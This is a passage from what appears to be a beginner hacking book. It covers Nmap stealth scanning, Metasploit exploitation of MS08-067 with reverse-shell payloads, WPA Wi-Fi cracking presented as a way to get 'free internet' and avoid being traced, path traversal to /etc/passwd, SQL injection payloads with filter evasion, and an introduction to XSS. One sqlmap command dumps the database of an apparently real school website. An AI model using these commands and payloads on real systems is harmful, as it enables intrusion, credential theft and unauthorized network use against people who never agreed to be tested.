connections. If Nmap manages to succeed with this procedure than we know
that the particular port is alive and potentially vulnerable.
Despite there being GUI based version of Nmap I will only discuss commands
given through the terminal to achieve better granularity. Below is our first
Nmap scan. IP-address is a placeholder and should be replaced with your
target.
root@kali:~# nmap -sT -p- -PN IP-address
With the -sT switch we choose a full three-way handshake, -p- means to scan
all ports otherwise only the first 1000 ports are scanned and -PN says to scan
if the system were alive.
Figure 54. Nmap -sT scan with no results
TCP-IP SYN scan
In the test above it took Nmap 107.37 second to test all ports of the target to
see if they were running live services. That is with a three way handshake.
Note that your reply of ACK is not strictly necessary to determine if the port is
being used. In fact, some services won’t even log a partial handshake. If we
fail to send the ACK it will make our scan nearly impossible to trace. I suggest
we simply skip the reply ACK. In Nmap this is known as a SYN test. With -sS
instead of -sT we command Nmap to carry out a SYN test. In fact, SYN is the
default Nmap test!
root@kali:~# nmap -sS -p- -PN IP-address
The results of the SYN test should be similar to the regular TCP-IP scan, but it
should also run a lot faster.
UDP scan
A connectionless UDP scan can be carried out with the switch -sU. Note we
also omit the -p- flag and only scan the first 1000 ports. This will speed up our
inquiries at the risk of performing an incomplete scan.
root@kali:~# nmap -sU -PN IP-address
UDP scanning is often overlooked, but it can definitely be a source of

vulnerability for a system. UDP scanning can take a lot longer than TCP-IP, so
be patient.
X-MAS scan
An important scan is the aptly named X-MAS scan. With this scan we send
data packets that have nearly every flag switched on. SYN and ACK are
switched off; instead FIN, PSH and URG are used. If a closed port receives a
packet with a flag other than SYN, ACK or RST it has to respond with a
packet containing RST. If the port is open, such a X-MAS packet is to be
ignored. This makes it trivial to uncover whether a port is open or closed.
Only Windows targets are smart enough not to respond to a X-MAS packet!
root@kali:~# nmap –sX -p- -PN IP-address
Figure 55. A short duration XMAS scan with no results

NULL scan
The opposite of a X-MAS scan is a NULL scan which sends a packet with
every flag option switched off. Again, a closed port will send back a packet
with the RST flag switched on while an open port should not send back a
packet at all. Again, Windows targets are immune to this type of scanning
while Linux and UNIX operating systems are not.
root@kali:~# nmap -sN -PN IP-address
Both X-MAS and NULL scan are well suited to bypass filters and Access
Controls Lists. Neither uses any aspect of the three-way handshake. Neither set
up a connection, they just establish if the port is in use.
Conclusion
Port scanning is a wonderful topic in penetration testing. Even the most secure
IT systems run at least a number of services, if they want to communicate with
the outside world. Nmap has a lot of options (switches) that are beyond the
scope of this book. Examples include, -sV with which you can identify a
service, with -O the OS and with -T we change the timing to obscure our
scanning efforts.
With a list of open ports on target, and perhaps a rudimentary idea of what
services the target runs a hacker can start his efforts on directly accessing the
target system by finding either a flaw in such a service or through a bad
configuration. A bad configuration could be as simple as something as default
username and password that was never changed.
Now that you have a list of open ports you can use the following commands if
the target is running Secure Shell on port 22 or Telnet on port 23.
root@kali:~# telnet IP-address

root@kali:~# ssh root@IP-address
Perhaps you will strike gold and discover that that your target is already
vulnerable to attack! If not, more rigorous discovery of vulnerabilities needs to
take place.
EXTRA:
Sneakers
This movie from 1992 by director Phil Alden Robinson holds a frank look at
the world of hacking without delving too much into code and software. Instead,
Sneakers deals with the nascent times of phone-phreaking but also covers
topics such as Social Engineering, cryptography and espionage. Sneakers was
released just as the Soviet-Union was collapsing and is very much a product of
its time. The cast includes Robert Redford, Dan Akroyd, Sydney Poitier and
Ben Kingsley.
The story of Sneakers is about Martin Bishop (A.K.A Martin Brice). He has
been on the run from the authorities for decades after being accused of hacking
several banks in the late 60’s during the time of civil strife. The character of
Bishop feels like a stand-in for Kevin Mitnick who had already served one
sentence and by 1992 was on the run from the FBI. Bishop runs a small outfit
that attempts to break into banks to test their security. Of course nobody around
knows of his former identity and that he is a wanted fugitive. Bishop has a
crew including characters such as "Whistler" who is blind and clearly inspired
by Joybubbles, the famous phone-phreaker.
Bishop and his gang are convinced to steal a device form a scientist by what
looks to be the NSA in return for immunity from prosecution. But not
everything appears to be what it is.
Sneakers deals with a device invented by a mathematician that can at an instant

decrypt pretty much all Cryptography. In essence he solved p = np, this means
any crypt (the problem) can be resolved as quickly as the decoding solution
can be stated[i]. Computer Scientist Len Adleman worked as a consultant on the
movie, but only on the condition if his wife could meet Robert Redford[ii]. The
mathematician is murdered in a way eerily similar to the death of real-life
hacker Karl Koch. A race against time begins as Martin tries to prevent an old
nemesis from getting his hands on the device.
The most memorable moment of the movie comes when Martin Bishop
deciphers the meaning of the phrase SETEC ASTRONOMY. It means TOO
MANY SECRETS. A long time ago I was involved with a PC game project. I
had to program the network connection and as a joke I created a backdoor.
Whenever the phrase SETEC ASTRONOMY was entered by the user they
would automatically win the game. Check out Sneakers, it’s still a good movie!
Chapter 3 Exploitation
After having discovered possible entry points for a hack on our target system
the next phase can begin. With exploitation we attempt to discover actual
weaknesses in the system and exploit them. The go to place for exploitation is
Metasploit, a collection of assembled weaknesses users can deploy towards
any target system.
Metasploit tutorial
In this chapter the topic of discussion will be the Metasploit framework, a tool
that allows users to execute nearly any kind of attack on a target. I will
forewarn the reader about one issue: frequent use of Metasploit as a beginner
pen tester won’t make you a great hacker. Usually I will say that tools are for
scriptkiddies, but the security community has taken to Metasploit with interest
and its influence can’t be ignored.
Figure 56. Metasploit start screen

If you are running Kali Linux then Metasploit will already be installed. For
other Linux systems you will have to execute the following commands.
wget http://downloads.metasploit.com/data/releases/metasploit-latest-
linux-x64-installer.run
chmod +x /path/to/metasploit-latest-linux-x64-installer.run
sudo /path/to/metasploit-latest-linux-x64-installer.run
After the framework is running you will be prompted for a port number, choose
port 3790.
To start Metasploit we first need to start the PostgreSQL database to track what
you do.
root@kali:~# service postgresql start
We also need to create and initialize the msf database with the command
root@kali:~# msfdb init
If you have browsed through all the security tools installed with Kali you may
have noticed there is a GUI version of Metasploit. We will be using
msfconsole, the Terminal based interface. Type in the following command to
start the interface
root@kali:~# msfconsole
Don’t be alarmed if Metasploit takes a while to start, also note the text-based
graphics can change with every new release of the framework. The remainder
of the startup screen shows you which version you have of Metasploit, how
many exploits and payloads are present. Always make sure you have a recent
version of the Metasploit framework.
Trouble managing data? List, sort, group, tag and search your pentest
data
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.5-2016010401 ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
After the program has started the user is prompted into the msf console. In
Metasploit we can search for known vulnerabilities or exploits using the
search function. An example is the well-known security vulnerability ms08-
067 that affects older versions of Windows XP and Windows Server 2003. A
PC affected by ms08-067 is vulnerable to remote code execution. Essentially
you can hijack the operating system. Chances are good that if you scanned a
Windows XP machine (or one of your own hack lab machines) that you have
found it is vulnerable. With Metasploit you can search for all relevant
information regarding a vulnerability and create a payload package to attack a
system. First, let’s search for ms08-067 with the search command
msf > search ms08-067
As you see this will return one known exploit matching that name. It gives a
brief description and rank but little else.
Matching Modules
================
Name Disclosure Date Rank
Description
---- --------------- ---
- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-
067 Microsoft Server
Service Relative Path Stack
Corruption
As the framework is built on a database your commands are converted into a

SQL query. To search for vulnerabilities that may be related to Microsoft
products that were disclosed in 2008 you can use the wildcard character %.
The percentage sign is used for DBs while the star (*) is used with regular
expressions (Linux commands etc). If we use the wildcard sign % after ms08
we discover there are 7 such vulnerabilities.
To learn more about a specific vulnerability we use the info function. Note that
we use the fully qualified name of the vulnerability as found by the search
function.
msf > info exploit/windows/smb/ms08_067_netapi
What follows is an extended description of the vulnerability or exploit. The
section Available target: shows all possible target machines. The section
Basic options show the requirements to fulfill the exploit while Payload
information shows what is possible to transmit. With Metasploit it is possible
to mix and match exploits and payloads. You can even create your own
payload. For ms08_067 we have a payload size of 410 characters. The final
section describes the vulnerability briefly.
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service
packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.
It appears from this description that if the target machine is not properly set up
the exploit could just as well crash the machine. Let’s proceed with using the
exploit. Type in the following into the msf console. You can use autocomplete
if you do not remember the exact name of the exploit.
msf > use windows/smb/ms08_067_netapi
With the command show targets we again list possible operating systems that
are vulnerable to this exploit.
msf > exploit(ms08_067_netapi) > show targets
With the command show payloads we see a list of compatible payloads.
msf > exploit(ms08_067_netapi) > show payloads
As you may see there is no shortage of payloads that we can use. Yet finding
one you can easily work with is not trivial. One possible payload is bind_tcp.
msf > exploit(ms08_067_netapi) > set PAYLOAD
windows/vncinject/bind_tcp
Now that we have chosen the payload we still need to enter details of the
target machine so the exploit can perform it attack. With the command show
options we get an overview of the details a user needs to enter. These of
course will differ across exploit and payload.
msf > exploit(ms08_067_netapi) > show options
Figure 57. The netapi vulnerability has no shortage of payloads
For the bind_tcp payload we see a series of required inputs. However, some
already have a default value. We will use these and only input those that are
absolutely necessary. One of those is RHOST, the IP address of our target. In
this case that is our target Windows XP machine which I can locate at
192.168.1.102
msf > exploit(ms08_067_netapi) > set RHOST 192.168.1. 102
For this payload all necessary details have been entered. To perform the
exploit we now simply input the command exploit.
msf > exploit(ms08_067_netapi) > exploit
You will now gain access to a virtual screen of the Windows XP target. You
can move you cursor across the screen and even click on folders and
applications. To proof you have control you can just switch of the target
machine.
Another useful payload that may be more efficient and less prone to alert any
sue of the target machine is a command shell. Instead of vncinject payload we
will use meterpreter.
msf > exploit(ms08_067_netapi) > set payload
windows/meterpreter/reverse_tcp
The reverse_tcp payload is useful because the target machine will be the one
to make a tcp connection with us. To complete the payload we must once again
set the target IP address (192.168.1. 102). Once set we can sue the command
exploit to yet again penetrate out target machine.
This we are given a Windows XP CMD shell to control our systems. I hope
you remember your Windows CMD commands. They will come in handy here.
With sysinfo and ipconfig you can verify the identity of your target. It is even
possible to open a VNC graphical desktop with the command run vnc.
Concluding remarks
Playing around with Metasploit can really help those new to pen testing to get
a feel of what it is all about. Chances are if you worked through this chapter
you will have performed you’re first true hack. Don’t be fooled by thinking that
you’re new found skills are useless just because you’re target is a Windows
XP machine. Windows XP still count as the third most popular OS in the world
after Windows 7 and Windows 10. Windows XP endured for a very long time
before its replacement became available and as such it can be found on many
embedded system, servers and other machines that have run for years. They
will continue to do so for many more years.
If you want to try your luck with other exploits just type in back in the msf
console.
All this presumes you have found vulnerabilities for your target system. It is
well possible you haven’t. Perhaps you do know the target operating system,
the version number of the OS and that of the services that are running from
you’re work in reconnaissance. With Metasploit we can search for all know
vulnerabilities using this information. To list all Windows exploits just enter
the following.
msf >search exploit/windows/fileformat/
Other options you can choose from are UNIX, multi, solaris, firefox, apple_ios
and a few others. Remember, you can get to know your target machine a lot
better by performing extensive scans to detect vulnerabilities. A powerful tool
such as Nessus is invaluable, but there is the danger that you won’t learn
anything about the underlying cause of vulnerability’s. Finally you have made it
to the really juicy part of exploitation!
Chapter 4 Wireless hacking
How to hack WIFI for free internet
One of the basic tenants of hacking is being sure that no one can find if they do
put a trace on you. I am pretty sure they won't send any attack helicopters if you
break into something because people generally feel a sense of futility when
hacked. However, it is possible if you provoke a target long enough or you
hack somebody who really doesn't appreciate it.
One way to diminish the risk of being tracked down is to use wireless internet,
or Wifi. Now you are not stuck to an Ethernet cable that goes to your own
router (that's a smoking gun), but instead you use somebody else’s Wi-Fi
connection. All you need is the password to gain access to that network. To
gain access to a Wi-Fi network there are three levels of difficulty.
1. No password protection
This was once the most popular Wi-Fi set up. No one bothered to put up a
password. However, people have gotten smart and now are unwilling to have
somebody ride along the Wi-Fi signals. Also because manufactures of wireless
routers put a password on them as standard procedure means this is becoming
uncommon in residential areas. However, a lot of business such as coffee
shops and lunchrooms offer free Wi-Fi internet. Just don't forget that you
shouldn't access anything on the internet with your name on it because of you're
going the way of the black hat hacker the police can reconstruct a lot using
digital forensics.
2. WEP protection
The second difficulty level is a wireless set up protected by WEP encryption.
These are also becoming uncommon because they were cracked rather easily.
3. WAP/WAP2 encryption
WEP is being replaced by WAP/WAP2 encryption. In theory the hack is pretty
much impossible if it is a truly random password the users are using. However,
its security is flawed when people fill in simple password that they can easily
remember. And so enter the hacker word list. A word list is very long list of
commonly used names, phrases and such that we will use one by one to test as
the password for the system. One popularly used list is darkc0de.lst. You can
download it from the internet[12]. Essentially it is text file around 17 Mb in size
which has been compiled by hackers. We will be using the list to perform our
hacks. You can also make your own list.
The guide below will give you an overview of what is needed to hack into a
Wifi network. The first step is an optional step. You should change the MAC
address of the network device you're using. This is not for security purposes
but it makes it easier to distinguish your own device from others. For this step
we first need to shut down our network device mon0. This is almost the same
as putting it in Flight Mode.
root@kali:~# ifconfig mon0 down
root@kali:~# macchanger -m 00:11:22:33:44:55 mon0
root@kali:~# ifconfig mon0
Note the structure of the MAC address will need to be the same as before. But
any new series of numbers will do. After changing it put the network device
back on with ifconfig.
During the second step we will start to collect data on potential Wifi networks
that can be hacked. Type in the following airo-dump command.
root@kali:~# airodump-ng mon0
You should see a list of wireless networks. You should also see your own
network otherwise or you are doing something wrong. It could be that many of
the networks are out of range and that you can only access you're own. Well,
for the purposes of this exercise you should then hack you're own so you at
least know how it is done. Next time you can use a place which you know has
Wifi to try your luck. Word to the wise, usually wireless signals travel further
in the morning.
Now that have successfully compiled a list of wireless networks you can begin
your analysis. As you look at the column ENC (Encryption) you will mostly
see WAP2, some WAP and even fewer WEP encrypted networks. Perhaps you
even see one or two open networks. Well, we are here to hack and not to play
things easy so we will ignore all those none WAP/WAP2. Just pick a WPA2
network as our method will work the same for WPA.
During the third step we will attempt to make a connection to a device with the
hopes it will reveal itself as a target. We refer to a wireless device that can
also transmit as a station. A device that can only receive information is not
interesting if we want free internet. So let’s show how this works.
The command below can be broken down as follows. We specify what channel
we are listening to with -c, we then input the channel number at X. With -w we
specify we want to write down the details of target. The string afterward is the
file name we specify for that purposes.
The --bssid option specifies we listen to just one wireless device. This is
because more than one device can be on the same channel. Next. Copy the
BSSID of the target into the command you're writing. The –ivs specify we
listen to ivs only and with mon0 we specify the device we want to use.
root@kali:~# airodump-ng -c X -w WPACrackTest --bssid
XX:XX:XX:XX:XX:XX --ivs mon0
Next you should see a station. Finding a station is important as it means we

have found a device that can transmit. If you don't find a station, then this will
not work and you will need to pick another target. I know I know, that is a
bitch, but try it a few times anyway to get used to this whole procedure. We are
almost done anyway.
Now if you did get a station, well that is wonderful. Keep the command
running because we need to make a handshake with the router.
Open up an extra terminal window. Next we will tease the wireless router by
sending a deauthenticate message. The command below can be broken down
as follows. 1 means the number of packages sent, we will send just the one, not
a hundred! At the NAMEOFROUTER fill in the name of the wireless router
you want to hack. You can find that under ESSID in the previous terminal. Be
careful with the capital letters.
root@kali:~# aireplay-ng -0 1 -e NAMEOFROUTER mon0
If the command went well and the handshake was made, we should be able to
see this in the terminal in which airodump was running. At the top the line [
WPA handshake: XX:XX:XX:XX:XX:XX should pop up.
If everything went alright and you have found a viable target we can perform
the final phase, and that is guessing the password used by the target. You will
need to know the path to the wordlist you're keeping. If you have darkc0de.lst
just put it in the Desktop. The last command is as follows.
root@kali:~# aircrack-ng -w /root/Desktop/darkc0de.lst
WPACrackTest2-01.ivs
Note that we made file earlier with the extension .ivs You're OS probably
added -01 to it so check the correct name of the file. After you enter the
command it will go down the entire word list to find the correct password. If
the password isn't in there, then tough! You can use other word list to try out if
they work. Believe or not there is a whole industry online producing them. You
can also use a programs called Crunch and Hashcat to make your own lists. If
you want to check whether this method works at all than insert the password of
your own network device on the word list when hacking your own network.
Have fun. And above all be patient. WPA/WPA2 hacking can take a very long
time!
Now with this series of commands you had to specify a lot yourself, but there
are also automated programs that will check all the networks available to you
such as Wifite, Reaver and others. Check them out as well.
Mr. Robot:
Between madness and reality
Hacking can be a hit or miss business in movies and on TV. Not so with the
new TV-series created by Sam Esmail. The show features Rami Malek as
Elliot Alderson. Elliot is a grey-hat hacker. He has a day job in IT security but
at night transforms into a vigilante hacktivist. He joins a secretive organization
called fsociety in an effort to expose the corrupt practices of E-Corp. So far a
lot may sound familiar, but Mr. Robot beats expectations by depicting a
realistic scenario of how a corporate hack may be perpetrated. In addition, the
delusions Elliot has of his friends and family makes you wonder what if
anything on this show is real.
The cast is expanded with excellent performance from Christian Slater, Martin
Wallström and BD Wong.
So what hacking methods are used? One of Elliot’s friends suffers an
embarrassing revelation when she uses CD that contains autorun spyware.
Similarly, a SD card with a rootkit is used to gain access to an android phone.
Elliot attempts to hijack E-Corps climate control system by introducing a
Raspberry Pi in a so-called “man in the middle” attack. Hacks against such
Industrial Control Systems (ICS) are increasingly more common. Elliot also
uses a proximity card cloner; such a device copies the contents of an access
card to allow unfettered access to any part of a building. During season 2
Elliot plants spyware on a smartphone enabling him to listen to every
conversation even if the phone is not in use. Such spyware is freely available
for sale and is suspected to be in regular use with many of the world’s
intelligence agencies.
Mr. Robot has just finished its second season. Be sure to check it if you haven’t
already!
Chapter 5 Path Traversal
Introduction to Path Traversal
Every website you visit runs on a server that will output the HTML (Hyper
Text Markup Language) which your browser will interpret and make readable.
However, HTML is static. To have things like search engines, animations and
advanced markup a website will need to use a language such as PHP to
dynamically alter the HTML code as you peruse through the website. This
leaves the website vulnerable to two types of attack. The first is Path Traversal
whereby you essentially manipulate the URL string to get to places you aren’t
supposed to have access to. The second is SQL Injection, which is the topic of
chapter 6. As over 75% of the world’s server run on Linux (most of them
Apache HTTP Server) it stands to reason that they all have files such as
passwd and shadow. Indeed they do, of course these two files aren’t the Holy
Grail that they once were, but there are plenty of other interesting files to find.
Path Traversal == Change Directory
To manipulate the URL to go to other places you essentially append ../ to the
string. For those who have been paying attention will notice where this comes
from. The forward slash / indicates a map structure in Linux instead of a file
and .. we have seen before with the cd command where it was used to change
to another folder in the Linux folder structure. Indeed, the command cd .. is
translated by the kernel into ../
However, if you were to try this out on a random website you will probably
end up being disappointed as nothing will happen. At least on a typical
website. At most you will be send back one page. To move back in the map
structure of a website to explore parts you weren’t supposed to see you have
try and induce a flaw. If for example you see an URL extension as follow,
URL/index.php?c=page&p=Welcome
Than you can alter some of the parameters to try and induce an error message.
For example, changing the word Welcome to anything else that is unlikely to be
a valid website parameter will do. If you end up seeing a lot of nonsense than
the website is vulnerable and you can perform path traversal. Finding files in
hidden locations is not the only possible vulnerability. By systematically
navigating through the entire website you may be able to find a login screen in
use by the administrator. As the screen is located where no one is supposed to
find perhaps the username and password were never altered from the default.
For the purpose of this tutorial we keep it simple. The objective remains to
find the passwd file located in the etc folder. You may remember from the
lesson on the Linux file system that the etc folder is located in the /home/
directory. However, the website you currently navigating may be running on
code that can be multiple levels down. Below you see an example of a
systematic search for the /etc/ directory and the passwd file specifically.
URL/index.php?c=page&p=../etc/passwd
URL/index.php?c=page&p=../../etc/passwd
URL/index.php?c=page&p=../../../etc/passwd
As we have no idea how deep back we need to move to find the root directory
and then the etc folder we need to do perform a number of attempts. The
example above is an illustration, but a website can have many extensions
beyond just c=page. There can also be c=news, c=employees and a lot more.
To fully exploit the vulnerabilities of Path Traversal you should try and find
important files. Below is a small selection of files any hacker should have a
look at.
Database location
/var/lib/located
/var/chache/locate/located
Common files
.profile *
.bashrc
.bach_history
.history
.mysql_history
.shrc
* This file contains the PATH location. It can be interesting to alter in order to
run scripts.
DotDotPWN
A handy tool you can find in the Kali Linux toolkit is DotDotPWN which will
try and find path traversal vulnerabilities for you. You can start the tool from
the command line. It’s a Perl script so don’t forget the .pl extension. A simple
example of DotDotPWN is as follows
dotdotpwn.pl -m http -h http://websitetotest.com
Here the switch –m indicates the module you wish to use as a payload, in this
case http but you should also use ftp and stdout. Using the keyword payload
you can specify a text file to be used.
With the –d switch you can set the depth at which it will look, the default value
is six times ../. With –o you can attempt to scan the operating system in use.
With the –f switch you can specify the file that needs to be found. The default
file is as you may guess /etc/passwd. Below is a more complicated version of
the DotDotPWN command.
dotdotpwn.pl -m payload -h http://websitetotest.com –p ~/test.txt –f

/etc/secret -o
Conclusion
In the opening paragraph I stated that the Apache HTTP Server is the world’s
most popular. However, Microsoft’s IIS (Internet Information Services) also
has a healthy market share of around 30%. Path Traversal for IIS not that
different but of course you have to use a back slash instead of forward slash. A
IIS file you may want to try and discover is
\Windows\System32\drivers\etc\hosts. Just like the passwd file on Apache it
always exists.
Path Traversal remains popular by hackers. It has elements of both
reconnaissance and exploitation. However, URL filters are steadily being
applied more and more. To bypass filters you need to add special character
sequences such as %00, also known as the poison Null byte or use ….//
instead of ../
Chapter 6 SQL Injection
With SQL injection it is possible to manipulate website queries that are sent to
its database (the backend). Websites such as blogs and web shops make use of
Content Management Systems (CMS) to keep track of the wares they sell but
also of users that have access to the back-end. Through direct manipulation of
the website front-end it should be possible to obtain user names and
passwords, including those of the administrator. Once this has been obtained a
malicious person practically has unlimited access.
One possible form of SQL injection is by altering the websites URL that you
see in your browser. If by chance a website is vulnerable to such an attack
some confidential information may be printed in the website for you to read.
Such an attack is explained in the first paragraph. Alternative attacks will
target the input boxes such as a login form of the website. We will discuss such
attacks in the second paragraph.
URL attacks
The most common target for SQL injection are web shops. Their entire
business rests on the underlying database. A products id, description, price and
picture are all stored in their database and subsequently displayed through a
language like PHP which converts it to HTML on the server-side. Most likely
the product id code is directly shown in the URL as shown below.
www.webshop.com/index.php?product=101
By manipulating the URL you can perhaps make other parts of the database be
printed out next to the information concerning the product. Before we try our
hand at hacking a websites database I will try and give an overview of how
database information is retrieved. Web shops store data in a SQL (pronounced
sequel) database. A basic SQL statement looks as follows.
SELECT id, name FROM users WHERE id = 1
The structure SELECT FROM WHERE is the basis of all SQL statements.
Don’t mind the capitalized words, in reality they don’t matter but convention
has made it so we use them. In this case the SQL statement states that we want
the id (identification) and name from a database table called users that
correspond to id ‘1’. This statement does presume such data exists. In a
database such a table may look like the following example.
Users
id name password
1 John Doe secret
2 Jane Smith revenge
3 Sam Jones abc1234
Things get interesting if we also assume the database has a column called
password. Obtaining the password is the ultimate goal of our attack, and it
right there for the taking. We can obtain the password if we were to manipulate
a query in the URL and alter it beyond the intention of the website designer.
The best way to find out whether a website is susceptible to a SQL injection
attack is to elicit an error, similar to the way Path Traversal is exposed. If you
can elicit an error, it means that no proper filtering of input is in place. To
check the websites address for SQL injection merely start by placing a ‘ (tick)
behind its address. However, you will need to test it at a place other than the
home address. www.webshop.com is not susceptible to attack of the form
www.webshop.com’ - Instead find a spot where the web address also includes
details that can only have come from a database. For example
www.webshop.com/index.php?product=101’
This address shows the 101st product found in the database, by adding a ’ to the
address we induce an error in the SQL statement used by the website to
retrieve the 101st product. There are more characters that may induce an error
message. I advise to just type in
abc'\$"(#
There are also command to probe further and see if a database is hackable.
Examples include,
1 AND 1=1
1 AND 1=2
1' AND 1='1
1' AND 1='2
' OR 1='1
' OR 1=1 #
OR 1=1 #
If we are successful in laying bare this error the next step is to try and retrieve
a username and matching password. The SQL statement used by the website is
hardcoded within PHP and looks as follows.
SELECT id, description, price, picture FROM products WHERE
product = input
I have written input in italics to underline that this is the only things that can be
altered. The results of the query; id, description, price and picture are placed
by the PHP code in their proper format on the website. The important thing to
understand here is that I can only alter the WHERE statement, this limits my
ability to display what is shown on the website. However, a second query can
be pasted behind the first if I use the UNION statement which is SQL keyword
that returns values of two queries. Below I show how the URL is changed and
the SQL statement that it carries out
www.webshop.com/index.php?product=-1 UNION SELECT name,
password, 3, 4, 5 FROM name WHERE id = 1
The complete query then becomes as follows.
SELECT id, description, price, picture FROM products WHERE
product = -1 UNION SELECT name, password, 3, 4, 5 FROM users
WHERE name = 1
This new query that I unleash should get me all the details of user with id equal
to 1. I can retrieve the information of all users by inputting different numbers.
As you may have guessed UNION combines information from two database
tables. I also changed the where statement of the first query to a value I know
does not exist, in this case -1. This way the first query returns nothing. You can
also try a tick ’ instead of a value like -1. One important thing to remember is
that the number of columns in both queries need to be the same. Yet, a user
table might have fewer columns. We can add numbers as a placeholder instead.
I have used 3 to 5, but anything will do.
It is important to use the exact number of columns in both queries (I will
mention that twice). You can use the ORDER BY command to figure that out.
Filter evasion and database information
It may well be that you have tried some of the above on a target that you found
and that nothing worked. Websites do commonly employ filter scripts to guard
against SQL injection. However, there are some work around characters. Try
appending any of the following three comments to your Injection code.
-- - # /*
Using the following command as part of SQL Injection can reveal details of the
database used.
SELECT VERSION() – return the operating system
SELECT DATABASE() - returns the database name
SELECT USER() – return the username of the person who is controlling
the server.
SELECT schema_name FROM INFORMATION_SCHEMA.schemata; –
returns the list of databases
SELECT table_schema, table_name FROM
INFORMATION_SCHEMA.tables; - returns the list of tables
SELECT table_name, column_name FROM
INFORMATION_SCHEMA.columns; - returns the list of columns
Below I have created an example that can give an indication of how to use
more complex SQL injection commands. Can you identify the parts of the
statement and figure out how they work?
' UNION SELECT VERSION() #
The attack that I have explained here is simple, even if it does rely on trial and
error, and is the single most common hacking attack performed! It is important
to know what common names are for tables and columns, but this information
can easily be found online. One thing to remember is that there are many
flavors of SQL databases, some have very different commands. The first thing
to after you have incited an error message is to figure out which type of SQL
DB is running. The VERSION() and DATABASE() functions should help with
that.
SQL Dorks
As you may have guessed by now any website that has a URL containing a
string such as id=416 or variants thereof is open to potential attacks. Many
web administrators don’t update their software either out of laziness or fearful
of changing settings. With search engines such as google you can search
vulnerable website. Just type in URL:id=416 and you will receive every
website with that string. Such targets are called dorks in the hacker community.
If you have your own website, for example a blog do perform all the necessary
updates and change your permalinks to a format that uses only words instead of
numbers. For example
www.myblog.com/helloworld
instead of,
www.myblog.com/?p=416
Please note that Google is aware that its search engine is used in this fashion
and from time to time has prevented search results from being returned.
Webform injection
Trying to gain access to a user’s credentials as outlined above can be seen as
accessing the backdoor. There is also another method which relies on
manipulating the username and password field of a login screen. Though other
input fields will work as well. As mentioned the – sign is used to delineate in
an SQL statement. Using this as input in a field is a handy way to bypass
additional filters. In some cases, inputting a username followed by – will
bypass code asking for a password. If you do not know the username you will
have to start there. Input the following in the username field
‘ or 1 = 1--
This will always evaluate to true. Now most Databases will use the first
username instead, which is often the administrator. It is not yet necessary to
know the password (we don’t know it anyway) but you may have to type
something into password field. This is commented out by the double dash “- -“,
but a placeholder value should be inputted otherwise the client side may
complain. Now we either have retrieved a username or we can access the
database and continue our hunt. The next step is to repeat the entire process for
the password field. This kind of attack is still popular, but it is becoming rare
as systems have increasingly better filters. To increase your chances there are
variations of the input code that you should also try.
SQLMap
Performing SQL injection can be laborious work. Technically it is not
challenging, the concept and implementation are easy to understand, but if you
should miss a vulnerability your search can go on for ages. As SQL injection
requires systematic work tools have been developed to test a website for
vulnerabilities. Kali Linux comes with a tool called SQLMap that allows us to
perform a systematic SQL injection attack and specify what we want in return;
the entire database, just a few tables or even command shell access. A basic
SQLMap test looks as follows
root@kali:~# sqlmap -u "http://moodle.lynfield.school.nz/course/view.php?
id=416" –dump
The switch –u specified that we a have a target URL. The URL comes
immediately afterwards and contains an entry point into the underlying
database, in this case id=416. The switch –dump will dump the entire
database. SQLMap is a very diverse tool with many options to test for specific
vulnerabilities. A full disclosure is beyond the scope of this text but do visit
places such as stackoverflow.com to ensure that your own website remains
free of SQL injection by checking what the latest techniques are.
There are more types of SQL attacks, but I will cut this subject off as there is
more ground to cover elsewhere. If you’re keen to know more about SQL
Injection have a look at Piggy-Backed Queries, Blind attacks and Timing
attacks.
Compared to the tools we used during the three-step hacking methodology
(Reconnaissance, Scanning and Exploitation) SQL injection can be considered
technical. I hope you understand after this lesson that the underlying
weaknesses of this type of attack lies with the database and the web code that
acts as an interface between the user (a client using a browser) and the DB. To
get a complete understanding of this topic you will have to know the subtleties
between different types of SQL databases (PostgreSQL, SQLite) and its
dialects. Of course a good feeling of web programming is also necessary if you
want find weaknesses and protect against them. Suggestions I would make are
PHP and JavaScript. If you want to get a good overview of how a web shop,
its databases and services work together then I recommend you start a blog.
The myriad of security issues you will encounter will serve as an excellent
source for experience.
Neuromancer
One of the first references in popular culture to hacking was in Neuromancer,
the 1984 science-fiction novel by William Gibson. In the story, a down on his
luck hacker named Case attempts to regain his skills by accepting a very
dangerous job. Neuromancer in many ways acted as prototype for the movie
The Matrix. Its influence can be felt in its theme (Artificial Intelligence) and its
main characters.
Neuromancer was one of the first novels that depicted hacking as a major
theme. Yet, it also betrayed the writer’s ignorance of what it was. In the story
whenever Case wants to penetrate a secure system he would use an icebreaker
program. Such a program was depicted as a physical entity, not software. Yet
despite this the term icebreaker has entered hacker parlance. A movie
adaptation of Neuromancer has been in development hell for decades. The
references to a movie production was made in May 2015.
More Cyberpunk
Neuromancer has been influential along with Blade Runner since its release.
Together they define the Cyberpunk genre with its vivid depictions of urban
sprawls, mega-corporations and artificial intelligence. If you want to read
more Cyberpunk I can suggest Snow Crash by Neal Stephenson, Accelerando
by Charles Stross and the short story Cyberpunk by Bruce Bethke.
Chapter 7 Cross Site Scripting

Cross-site scripting or XSS is an attack in which a client-side script is
uploaded into a webpage. Such a script is activated when an unsuspected
viewer browses the page. Typically, the attacker uploads JavaScript into the
webpage as a comment to a news story or a thread of a discussion forum. Any
other internet user who visits that page automatically downloads the script
which is then executed by the browser. The purpose of XSS attacks can be
manifold, but a popular target is a web administrator. By having the malicious
script download his cookies the attacker can gain access to the website under
the administrator’s control. XSS attacks are more difficult to execute compared
SQL Injection, at least they require some rudimentary knowledge of languages
such as JavaScript. However, XSS is a natural follow up topic after having
learned the basics of SQL Injection. XSS is a popular method of attack. A lot
more websites are vulnerable to XSS than SQL Injection. Yet, determining this
is not as easy.
For an XSS attack almost any input box on a web page is a point of
vulnerability. Besides comment boxes for articles and threads these
vulnerabilities also include the Login, Register and Search boxes. As you may
guess, many websites do have filters in place against XSS attacks. A potential
attacker can encode their script to allow it to be placed on the page regardless.
